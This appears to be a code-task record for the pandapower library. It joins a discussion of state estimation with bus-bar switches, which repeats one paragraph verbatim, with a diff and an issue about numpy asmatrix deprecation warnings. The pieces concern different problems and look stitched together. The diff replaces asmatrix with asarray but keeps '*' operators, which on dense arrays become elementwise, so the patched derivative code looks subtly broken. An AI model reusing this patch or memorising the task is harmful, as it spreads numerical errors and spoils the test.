between bus 1,2 - bb+meas: using bb-switch and has p, q measurement on one of the buses with bb-switch - imp+meas: using small impedance and has p, q measurement on one of the buses P_mw injections on buses: | bus id | Original| bb | imp | bb+meas | imp+meas | |--|--|--|--|--|--| | 0 | 0.35 | 0.35 | 0.35 | 0.43| 0.35 | | 1 | 0.45 | 0.7 | 0.05 | 0.62 | 0.45 | | 2 | 0.25 | 0.7 | 0.65 | 0.62 | 0.25 | | 3 | -1.09 | -1.09 | -1.08 | -1.09 | -1.08 | From the result, it seems like that small impedance with measurements delivers the best result. And if the network has bb-switch, the state estimation module seems fail to identify the buses, since it's automatically merged to one bus in ppc.
I am thinking of a possible fix to the issue with minimum change of the original process. Since the reason for the problem is that on the ppci level, multiple measurements (and also load, sgens) are fused together onto one single bus. My idea is to identify such cluster (ppci bus) with many-to-one bus mapping and using auxiliary buses on such a cluster with mupltiple devices to achieve the minimum code adjustment. 1. if a cluster has more than one buses with devices, add auxiliary buses for all the buses except the first one (to avoid generating a bus with zero p,q) to substitute the original bus in the ppci cluster 2. set all the bb switch onto the original bus to out of service and add auxiliary bb switches onto the newly added buses with the same configuration 3. add lines with small impedance between the auxilliary buses and the buses, which were substituted by the auxilliary buses 4. run the normal state estimation 5. remove all auxiliary buses, bb switches and lines, restore the in_service state of the original bb-switch 6. remove state estimation results for the auxiliary elements The results will thus mapping correctly onto the original configuration. I am thinking of a possible fix to the issue with minimum change of the original process. Since the reason for the problem is that on the ppci level, multiple measurements (and also load, sgens) are fused together onto one single bus. My idea is to identify such cluster (ppci bus) with many-to-one bus mapping and using auxiliary buses on such a cluster with mupltiple devices to achieve the minimum code adjustment. 1. if a cluster has more than one buses with devices, add auxiliary buses for all the buses except the first one (to avoid generating a bus with zero p,q) to substitute the original bus in the ppci cluster 2. set all the bb switch onto the original bus to out of service and add auxiliary bb switches onto the newly added buses with the same configuration 3. add lines with small impedance between the auxilliary buses and the buses, which were substituted by the auxilliary buses 4. run the normal state estimation 5. remove all auxiliary buses, bb switches and lines, restore the in_service state of the original bb-switch 6. remove state estimation results for the auxiliary elements The results will thus mapping correctly onto the original configuration.
2019-01-04T10:59:54
e2nIEE/pandapower
275
e2nIEE__pandapower-275
[ "273" ]
cf19dec15bc699ea4ca2d8a19e6fa9702a2c8414
diff --git a/pandapower/pf/dSbus_dV_pypower.py b/pandapower/pf/dSbus_dV_pypower.py --- a/pandapower/pf/dSbus_dV_pypower.py +++ b/pandapower/pf/dSbus_dV_pypower.py @@ -12,7 +12,7 @@ """Computes partial derivatives of power injection w.r.t. voltage. """ -from numpy import conj, diag, asmatrix, asarray, zeros +from numpy import conj, diag, asarray from scipy.sparse import issparse, csr_matrix as sparse @@ -39,11 +39,11 @@ def dSbus_dV_sparse(Ybus, V): def dSbus_dV_dense(Ybus, V): # standard code from Pypower (slower than above) - Ibus = Ybus * asmatrix(V).T + Ibus = Ybus * asarray(V).T - diagV = asmatrix(diag(V)) - diagIbus = asmatrix(diag(asarray(Ibus).flatten())) - diagVnorm = asmatrix(diag(V / abs(V))) + diagV = asarray(diag(V)) + diagIbus = asarray(diag(asarray(Ibus).flatten())) + diagVnorm = asarray(diag(V / abs(V))) dS_dVm = diagV * conj(Ybus * diagVnorm) + conj(diagIbus) * diagVnorm dS_dVa = 1j * diagV * conj(diagIbus - Ybus * diagV)
Deprecation warning for asmatrix The usage of numpy asmatrix raises Deprecation Warnings in numpy 1.15.4: PendingDeprecationWarning: the matrix subclass is not the recommended way to represent matrices or deal with linear algebra (see https://docs.scipy.org/doc/numpy/user/numpy-for-matlab-users.html). Please adjust your code to use regular ndarray. There are 5 occurences in pandapower/pf/dSbus_dV_pypower.py.
2019-01-24T15:46:38